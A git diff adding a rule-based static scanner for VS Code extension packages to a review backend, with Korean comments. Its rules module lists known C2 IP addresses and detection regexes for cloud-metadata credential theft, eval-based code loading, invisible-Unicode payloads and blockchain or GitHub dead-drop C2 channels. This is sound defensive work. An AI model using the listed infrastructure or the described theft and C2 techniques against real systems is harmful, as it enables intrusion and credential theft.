"""severity_counts(critical/high/medium/low)와 status를 받아 판정 dict 반환.""" + counts = severity_counts or {} + critical = int(counts.get("critical", 0)) + + if status == "error": + return { + "decision": "review", + "suggest_reject": False, + "reason": "분석 실패 — 수동 검토 필요 (fail-closed)", + } + + if critical >= 1: + return { + "decision": "review", + "suggest_reject": True, + "reason": f"Critical 룰 {critical}건 발화 — 거부 권장 + 수동 검토", + } + + return { + "decision": "review", + "suggest_reject": False, + "reason": "수동 검토 필요 (Tier1 자동 승인 없음)", + } diff --git a/backend/vscode_analysis/manifest_scan.py b/backend/vscode_analysis/manifest_scan.py new file mode 100644 index 00000000..4f6be1a2 --- /dev/null +++ b/backend/vscode_analysis/manifest_scan.py @@ -0,0 +1,61 @@ +"""Manifest(package.json) 룰: M-001, M-002, M-004, M-005, M-006.""" + +from collections import Counter +from typing import Any, Dict, List, Tuple + +try: + from backend.scanners.common import add_finding + from backend.vscode_analysis.rules import PUBLISHER_WHITELIST, RULE_META +except ModuleNotFoundError: # pragma: no cover - import shim + from scanners.common import add_finding + from vscode_analysis.rules import PUBLISHER_WHITELIST, RULE_META + + +def _emit(findings, counts, rule_id, evidence): + severity, category, title, recommendation = RULE_META[rule_id] + add_finding(findings, counts, severity, category, rule_id, title, evidence, recommendation) + + +def scan_manifest(manifest: Dict[str, Any]) -> Tuple[List[Dict[str, Any]], Counter]: + """package.json dict를 받아 manifest 룰 findings + severity_counts 반환.""" + findings: List[Dict[str, Any]] = [] + counts: Counter = Counter() + + if not isinstance(manifest, dict): + return findings, counts + + # M-001: activationEvents에 "*" 단독 포함 + activation = manifest.get("activationEvents") + if isinstance(activation, list) and "*" in activation: + _emit(findings, counts, "M-001", {"activationEvents": activation}) + + # M-002: enabledApiProposals 사용 ∧ publisher ∉ 화이트리스트 + proposals = manifest.get("enabledApiProposals") + if isinstance(proposals, list) and len(proposals) > 0: + publisher = str(manifest.get("publisher", "")).lower() + if publisher not in PUBLISHER_WHITELIST: + _emit(findings, counts, "M-002", + {"publisher": manifest.get("publisher"), "enabledApiProposals": proposals}) + + # M-004: extensionKind 키 부재 ∨ "workspace" 포함 + if "extensionKind" not in manifest: + _emit(findings, counts, "M-004", {"reason": "extensionKind 키 부재"}) + else: + kind = manifest.get("extensionKind") + kinds = kind if isinstance(kind, list) else [kind] + if "workspace" in kinds: + _emit(findings, counts, "M-004", {"extensionKind": kind}) + + # M-005: scripts.postinstall / scripts.preinstall 존재 + scripts = manifest.get("scripts") + if isinstance(scripts, dict): + hooks = {k: scripts[k] for k in ("postinstall", "preinstall") if k in scripts} + if hooks: + _emit(findings, counts, "M-005", {"scripts": hooks}) + + # M-006: extensionPack 비어있지 않음 + pack = manifest.get("extensionPack") + if isinstance(pack, list) and len(pack) > 0: + _emit(findings, counts, "M-006", {"extensionPack": pack}) + + return findings, counts diff --git a/backend/vscode_analysis/rules.py b/backend/vscode_analysis/rules.py new file mode 100644 index 00000000..29a95887 --- /dev/null +++ b/backend/vscode_analysis/rules.py @@ -0,0 +1,159 @@ +"""VSCode Tier1 룰 정의 + 화이트리스트 + IOC 상수. + +패턴 출처: dev/notes/vscode_rule_catalog.md 의 Pattern 열을 그대로 사용. +대상 룰: M-001,002,004,005,006 / C-003,004,006,007,009,010,011 / X-001,002,003 (총 15개) +""" + +import re + +# M-002 면제용 publisher 화이트리스트 (설계 §7) +PUBLISHER_WHITELIST = { + "ms-vscode", + "ms-python", + "ms-toolsai", + "github", + "vscode", + "microsoft", +} + +# C-006 알려진 C2 IP 상수 (카탈로그 C-006/Appendix B GlassWorm+Anivia) +KNOWN_C2_IPS = [ + "199.247.10.166", + "199.247.13.106", + "217.69.3.218", + "158.94.210.76", + "51.178.245.127", + "91.206.169.80", + "51.38.250.193", + "178.16.55.109", + "158.94.210.52", +] + +# C-007 클라우드 메타데이터 엔드포인트 (카탈로그 C-007) +CLOUD_METADATA_ENDPOINTS = [ + "169.254.169.254", + "169.254.170.2", + "metadata.google.internal", + "metadata.azure.com", +] + +# C-007 보안-인지 정제 (자격증명 탈취는 절대 면제 금지). +# 토큰/자격증명(identity) 엔드포인트는 무조건 Critical 유지 — 이게 보이면 예외 적용 안 함. +# instance/compute = VM 탐지(정상 텔레메트리), identity/token = 자격증명 탈취(위험). +# AWS IMDS: /iam/security-credentials, /latest/meta-data/iam, token PUT(IMDSv2) +# Azure: /metadata/identity, oauth2/token +# GCP: /computeMetadata/.../token, service-accounts/.../token +C007_CREDENTIAL_PATHS = re.compile( + r"/metadata/identity" # Azure managed identity 토큰 + r"|oauth2/token" # Azure/GCP OAuth 토큰 + r"|/iam/security-credentials" # AWS 인스턴스 역할 자격증명 + r"|/computeMetadata/" # GCP 메타데이터(토큰 포함 경로) + r"|service-accounts/[^/]+/token" # GCP SA 토큰 + r"|/latest/meta-data/iam" # AWS IAM 메타데이터 + r"|/api/token", # IMDSv2 token 엔드포인트류 + re.IGNORECASE, +) +# 면제 가능한 *정상* 인스턴스 메타데이터 경로 (VM 탐지/텔레메트리). 토큰 경로 없을 때만 의미. +# Azure App Insights: /metadata/instance/compute?api-version=... +C007_INSTANCE_METADATA_PATHS = re.compile( + r"/metadata/instance", # Azure instance metadata (compute/network 등 비자격증명) + re.IGNORECASE, +) + +# X-002 마스킹/예시 컨텍스트 — 이 토큰이 같은 줄에 있으면 면제 (설계 §7) +SECRET_MASK_TOKENS = ("EXAMPLE", "PLACEHOLDER", "XXX") + + +# --- Code body 정규식 (카탈로그 Pattern 열 그대로) --- + +# C-003: eval / new Function / vm.runIn* +C003_EVAL = re.compile( + r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn(NewContext|ThisContext|Context)\s*\(" +) + +# C-003 좁은 정상-맥락 예외 (번들러 보일러플레이트만 면제, 그 외 전부 Critical 유지). +# 안전성 근거: 두 패턴 모두 *문자열 리터럴 인자*만 허용 — 동적/연결 입력은 절대 매치 안 됨. +# (1) globalThis 폴리필: new Function("return this") / Function("return this") +# 인자가 정확히 리터럴 "return this" 일 때만. 그 외 new Function(x)/(...+x)는 발화. +C003_EXEMPT_RETURN_THIS = re.compile( + r"""(?:new\s+)?Function\s*\(\s*(['"])return this\1\s*\)""" +) +# (2) CommonJS require shim: eval("require('...')[.member]") +# eval 인자가 리터럴이고 그 내용이 require('mod') 또는 require('mod').member 형태일 때만. +# eval(변수), eval("a"+b), eval("악성코드") 등 비자명/동적 입력은 매치 안 됨 → 발화. +C003_EXEMPT_EVAL_REQUIRE = re.compile( + r"""\beval\s*\(\s*(['"])\s*require\(\s*['"][^'"]+['"]\s*\)(?:\.[A-Za-z_$][\w$]*)*\s*\1\s*\)""" +) + +# C-004: 비가시 Unicode 5자+ 연속 +# 카탈로그 Pattern: [\u{E0000}-\u{E007F}\u{2060}-\u{2064}\u{200B}-\u{200F}]{5,} +C004_INVISIBLE = re.compile( + "[󠀀-󠁿⁠-⁤​-‏]{5,}" +) + +# C-009: GitHub Search dead-drop +C009_GITHUB_SEARCH = re.compile(r"api\.github\.com/search/commits\?q=") + +# C-010: Blockchain / Calendar C2 백업 채널 +C010_BACKUP_CHANNEL = re.compile( + r"api\.mainnet-beta\.solana\.com|api\.devnet\.solana\.com|calendar\.google\.com/calendar/ical/.*ical" +) + +# C-011: native .node 모듈 로딩 +C011_NATIVE_NODE = re.compile(r"""require\(['"][^'"]*\.node['"]\)""") + + +# --- Secret 정규식 (카탈로그 X 룰 Pattern 열 그대로) --- + +# X-001: Azure DevOps PAT (52자 base32) — 맥락 키워드 동시 매칭 필수 +X001_PAT = re.compile(r"\b[a-z2-7]{52}\b") +X001_CONTEXT = re.compile(r"vsce|marketplace\.visualstudio\.com|ovsx", re.IGNORECASE) + +# X-002: LLM/클라우드 API 키 (OR 결합) +X002_SECRETS = re.compile( + r"sk-(?:proj-)?[A-Za-z0-9_-]{40,}" # OpenAI + r"|sk-ant-(?:api03-)?[A-Za-z0-9_-]{90,}" # Anthropic + r"|AKIA[0-9A-Z]{16}" # AWS Access Key + r"|gh[pousr]_[A-Za-z0-9]{36,}" # GitHub PAT + r"|hf_[A-Za-z0-9]{34}" # HuggingFace + r"|AIza[0-9A-Za-z_-]{35}" # GCP API + r"|xox[baprs]-[A-Za-z0-9-]{10,}" # Slack +) + +# X-003: GCP Service Account private key +X003_GCP_KEY = re.compile(r'"private_key"\s*:\s*"-----BEGIN PRIVATE KEY-----') + + +# 룰 메타데이터 (severity / category / title / recommendation) +RULE_META = { + "M-001": ("high", "manifest", "Eager activation (*)", + "activationEvents에 와일드카드(*) 단독 사용을 제거하고 구체적 트리거를 지정하세요."), + "M-002": ("high", "manifest", "Proposed API 사용 (publisher 미허용)", + "미허용 publisher의 enabledApiProposals 사용입니다. stable 빌드 정책 위반 여부를 검토하세요."), + "M-004": ("medium", "manifest", "extensionKind 누락 또는 workspace 실행", + "extensionKind 설정을 검토해 원격(workspace) 실행 위험을 평가하세요."), + "M-005": ("medium", "manifest", "install script 존재", + "postinstall/preinstall 스크립트가 존재합니다. 설치 시 실행 코드를 검토하세요."), + "M-006": ("medium", "manifest", "extensionPack 강제 묶음 설치", + "extensionPack 멤버 확장도 함께 분석 큐에 추가해 검토하세요."), + "C-003": ("critical", "code", "eval / new Function / vm.runIn*", + "동적 코드 실행 호출이 발견되었습니다. 인자 흐름을 검토하세요."), + "C-004": ("critical", "code", "비가시 Unicode 문자열 (5자+ 연속)", + "비가시 유니코드 페이로드(GlassWorm 패턴)가 의심됩니다. 즉시 격리 검토하세요."), + "C-006": ("critical", "code", "알려진 C2 IP 상수", + "알려진 C2 인프라 IP가 코드 상수로 발견되었습니다. 즉시 차단/격리하세요."), + "C-007": ("critical", "code", "클라우드 메타데이터 엔드포인트 접근", + "클라우드 IMDS/메타데이터 접근(자격증명 수집 의심)이 발견되었습니다."), + "C-009": ("high", "code", "GitHub Search dead-drop", + "GitHub Search commits 엔드포인트(dead-drop C2 패턴) 사용을 검토하세요."), + "C-010": ("high", "code", "Blockchain/Calendar C2 백업 채널", + "Solana RPC / Google Calendar ical 백업 채널 패턴을 검토하세요."), + "C-011": ("medium", "code", "Native .node 모듈 로딩", + "native(.node) 모듈 로딩이 있습니다. 정상 의존성인지 확인하세요."), + "X-001": ("critical", "secret", "Marketplace publisher PAT 노출", + "Azure DevOps/Marketplace PAT 노출이 의심됩니다. 즉시 토큰을 회수하세요."), + "X-002": ("high", "secret", "LLM/클라우드 API 키 노출", + "API 키가 노출되었습니다. 키를 회수하고 재발급하세요."), + "X-003": ("high", "secret", "GCP 서비스계정 private key 노출", + "GCP 서비스계정 private key 노출이 의심됩니다. 즉시 키를 회수하세요."), +} diff --git a/backend/vscode_analysis/runner.py b/backend/vscode_analysis/runner.py new file mode 100644 index 00000000..3e96180b --- /dev/null +++ b/backend/vscode_analysis/runner.py @@ -0,0 +1,138 @@ +"""VSCode 정적 분석 진입점. + +run_vscode_static_analysis(vsix_path): + VSIX(zip) 해제 -> extension/package.json -> 소스 순회 -> manifest+code 룰 합산 + -> run_static_analysis와 동일한 반환 키 구조 + decision 첨부. +파싱/해제 실패 시 status="error" 형태 반환 (raise 금지). +""" + +import json +import re +import zipfile +from collections import Counter +from typing import Any, Dict, List + +try: + from backend.scanners.common import summarize_findings + from backend.vscode_analysis import decision as decision_mod + from backend.vscode_analysis.manifest_scan import scan_manifest + from backend.vscode_analysis.code_scan import scan_sources + from backend.vscode_analysis.rules import PUBLISHER_WHITELIST +except ModuleNotFoundError: # pragma: no cover - import shim + from scanners.common import summarize_findings + from vscode_analysis import decision as decision_mod + from vscode_analysis.manifest_scan import scan_manifest + from vscode_analysis.code_scan import scan_sources + from vscode_analysis.rules import PUBLISHER_WHITELIST + + +SOURCE_EXT = re.compile(r"\.(js|ts|cjs|mjs)$", re.IGNORECASE) +# 시크릿(X 룰)은 더 넓은 파일을 대상으로 (카탈로그 X 룰: .json/.map/.md 등 포함) +SECRET_EXT = re.compile(r"\.(js|ts|cjs|mjs|json|map|md|env)$", re.IGNORECASE) +MAX_FILE_BYTES = 5 * 1024 * 1024 # 파일당 5MB 상한 (zip bomb/거대 번들 방어) + + +def _error_result(message: str) -> Dict[str, Any]: + empty = {"critical": 0, "high": 0, "medium": 0, "low": 0} + return { + "program_name": "unknown", + "program_version": "unknown", + "program_type": "vscode-extension", + "reputation_targets": [], + "summary": { + "scan_result": empty, + "overall_severity": "LOW", + "finding_count": 0, + "scanners": {}, + }, + "findings": [], + "scan_result": empty, + "enabled_scanners": ["vscode_manifest_scan", "vscode_code_scan"], + "status": "error", + "error": message, + "decision": decision_mod.decide(empty, status="error"), + } + + +def _read_manifest(zf: zipfile.ZipFile) -> Dict[str, Any]: + try: + raw = zf.read("extension/package.json") + except KeyError: + return {} + try: + return json.loads(raw.decode("utf-8", errors="replace")) + except (json.JSONDecodeError, ValueError): + return {} + + +def _collect_sources(zf: zipfile.ZipFile) -> List[Dict[str, Any]]: + entries: List[Dict[str, Any]] = [] + for info in zf.infolist(): + name = info.filename + if info.is_dir(): + continue + if not (SOURCE_EXT.search(name) or SECRET_EXT.search(name)): + continue + if info.file_size > MAX_FILE_BYTES: + continue + try: + raw = zf.read(name) + except (KeyError, zipfile.BadZipFile, OSError): + continue + entries.append({ + "file_name": name, + "content": raw.decode("utf-8", errors="replace"), + }) + return entries + + +def run_vscode_static_analysis(vsix_path: str) -> Dict[str, Any]: + try: + zf = zipfile.ZipFile(vsix_path) + except (zipfile.BadZipFile, FileNotFoundError, OSError) as exc: + return _error_result(f"VSIX 열기 실패: {exc}") + + try: + with zf: + manifest = _read_manifest(zf) + sources = _collect_sources(zf) + except (zipfile.BadZipFile, OSError) as exc: + return _error_result(f"VSIX 해제 실패: {exc}") + + findings: List[Dict[str, Any]] = [] + severity_counts: Counter = Counter() + + m_findings, m_counts = scan_manifest(manifest) + findings.extend(m_findings) + severity_counts.update(m_counts) + + publisher = str(manifest.get("publisher", "")).lower() + whitelisted = publisher in PUBLISHER_WHITELIST + c_findings, c_counts = scan_sources(sources, publisher_whitelisted=whitelisted) + findings.extend(c_findings) + severity_counts.update(c_counts) + + meta = summarize_findings(findings, severity_counts) + scan_result = meta["scan_result"] + + return { + "program_name": manifest.get("name", "unknown"), + "program_version": manifest.get("version", "unknown"), + "program_type": "vscode-extension", + "reputation_targets": [], + "summary": { + **meta, + "scanners": { + "vscode_manifest_scan": {"finding_count": len(m_findings)}, + "vscode_code_scan": { + "finding_count": len(c_findings), + "source_files_scanned": len(sources), + }, + }, + }, + "findings": findings, + "scan_result": scan_result, + "enabled_scanners": ["vscode_manifest_scan", "vscode_code_scan"], + "status": "ok", + "decision": decision_mod.decide(scan_result, status="ok"), + } diff --git a/main.py b/main.py index 62fa199e..422f3011 100644 --- a/main.py +++ b/main.py @@ -302,6 +302,125 @@ def build_final_risk_summary( "scan_result": {key: int(counts[key]) for key in SEVERITY_KEYS}, } +# VSCode(VSIX) 전용 스캔 흐름. Chrome 경로와 완전히 분리된 additive 처리. +# 동적분석을 skip하고 정적 룰만 사용하며, vscode_analysis.decision으로 판정한다. +async def _run_vscode_scan( + *, + file: UploadFile, + file_path: str, + extID: str, + browser: str, + version: str, + extName: str, +) -> dict: + from backend.vscode_analysis.runner import run_vscode_static_analysis + + vscode_result = await run_in_threadpool(run_vscode_static_analysis, file_path) + + # 동적/난독화는 VSCode에서 실행하지 않음 (skipped) + dynamic_result = {"status": "skipped"} + obfuscation_analysis = {"status": "skipped"} + + # build_web_payload가 기대하는 static_result 번들 형태로 감싼다. + full_result = { + "status": "success" if vscode_result.get("status") == "ok" else "error", + "analysis_id": None, + "static_analysis": vscode_result, + } + + vscode_decision = vscode_result.get("decision", {}) or {} + # decision.py: suggest_reject=True면 reject 의도(build_web_payload가 review로 강등), + # 그 외엔 review. VSCode Tier1은 자동 approve 없음. + decision = "reject" if vscode_decision.get("suggest_reject") else "review" + + final_risk_summary = build_final_risk_summary( + extension_id=extID, + ext_name=extName, + browser=browser, + version=version, + static_result_bundle=full_result, + dynamic_result=dynamic_result, + obfuscation_result=obfuscation_analysis, + ) + scan_counts = final_risk_summary["scan_result"] + if scan_counts.get("critical", 0) > 0: + final_risk_summary["risk_level"] = "CRITICAL" + elif scan_counts.get("high", 0) > 0: + final_risk_summary["risk_level"] = "HIGH" + elif scan_counts.get("medium", 0) > 0: + final_risk_summary["risk_level"] = "MEDIUM" + else: + final_risk_summary["risk_level"] = "LOW" + final_risk_summary["recommended_decision"] = "review" + final_risk_summary["decision_reason"] = vscode_decision.get("reason", "") + + _fired = sorted({(f.get("rule_id") or f.get("rule") or "?") for f in vscode_result.get("findings", [])}) + print( + f"[VSCODE-SCAN] ext={extName}({extID}) v{version} " + f"counts={vscode_result.get('scan_result')} fired={_fired} " + f"decision={decision} suggest_reject={vscode_decision.get('suggest_reject')} " + f"reason={vscode_decision.get('reason')}", + flush=True, + ) + + web_payload = build_web_payload( + ext_id=extID, + ext_name=extName, + browser=browser, + version=version, + file_name=file.filename, + static_result=full_result, + obfuscation_result=obfuscation_analysis, + dynamic_result=dynamic_result, + rag_fingerprint_result={}, + rag_rerank_result={}, + final_risk_summary=final_risk_summary, + decision=decision, + ) + + # 대시보드 표시 교정: VSCode는 dynamic 부재라 build_web_payload가 overall.risk_level을 + # LOW로 깔 수 있다. 정적 severity 기반 값으로 교정 (공유 web_payload.py 미수정, 본 분기에서만). + if isinstance(web_payload.get("overall"), dict): + web_payload["overall"]["risk_level"] = final_risk_summary["risk_level"] + + # Nexus review/ 업로드 — 대시보드('승인 대기중인 앱')가 Nexus review 폴더를 읽으므로 필요. + # Chrome 경로(main.py nexus upload 블록)와 동일 함수·정책 재사용. + if os.getenv("ENABLE_NEXUS_UPLOAD", "true").strip().lower() == "true": + try: + await file.seek(0) + nexus_bucket = _decision_to_nexus_bucket(decision) + await upload_plugin( + browser=browser, extID=extID, version=version, + file=file, extName=extName, judge=decision, decision=nexus_bucket, + ) + print(f"✅ [VSCODE Nexus] {extID} → {nexus_bucket} 업로드 완료", flush=True) + except Exception as nexus_e: + print(f"⚠️ [VSCODE Nexus] 업로드 실패: {str(nexus_e).strip() or repr(nexus_e)}", flush=True) + + # Web UI(/api/receive)로 결과 전달 — Chrome 경로와 동일 ENABLE_WEB_FORWARD 정책. + if os.getenv("ENABLE_WEB_FORWARD", "false").strip().lower() == "true": + try: + await send_web(web_payload) + print(f"✅ [VSCODE Web-Forward] {extID} 전송 완료", flush=True) + except Exception as web_e: + print(f"⚠️ [VSCODE Web-Forward] 전송 실패: {str(web_e).strip() or repr(web_e)}", flush=True) + + return { + "status": "success", + "analysis_id": None, + "extension_id": final_risk_summary["extension_id"], + "program_name": final_risk_summary["program_name"], + "program_type": final_risk_summary["program_type"], + "scan_result": final_risk_summary["scan_result"], + "final_risk_summary": final_risk_summary, + "static_result": vscode_result, + "dynamic_result": dynamic_result, + "obfuscation_result": obfuscation_analysis, + "vscode_decision": vscode_decision, + "web_payload": web_payload, + } + + @app.post("/file_scan") async def scan( file: UploadFile = File(...), @@ -317,6 +436,25 @@ async def scan( with open(file_path, "wb") as buffer: shutil.copyfileobj(file.file, buffer) + # VSCode(VSIX)는 동적분석 불가 → 전용 정적 흐름으로 early-branch. + # Chrome/기타 브라우저는 아래 기존 경로를 그대로 탄다 (불변). + if (browser or "").strip().lower() == "vscode": + try: + return await _run_vscode_scan( + file=file, + file_path=file_path, + extID=extID, + browser=browser, + version=version, + extName=extName, + ) + except Exception as vscode_e: + print("\n" + "=" * 50) + print("❌ VSCode 정적 분석 파이프라인 에러:") + traceback.print_exc() + print("=" * 50 + "\n") + return {"status": "error", "message": str(vscode_e)} + dynamic_result = {"status": "skipped"} full_result = { "status": "skipped",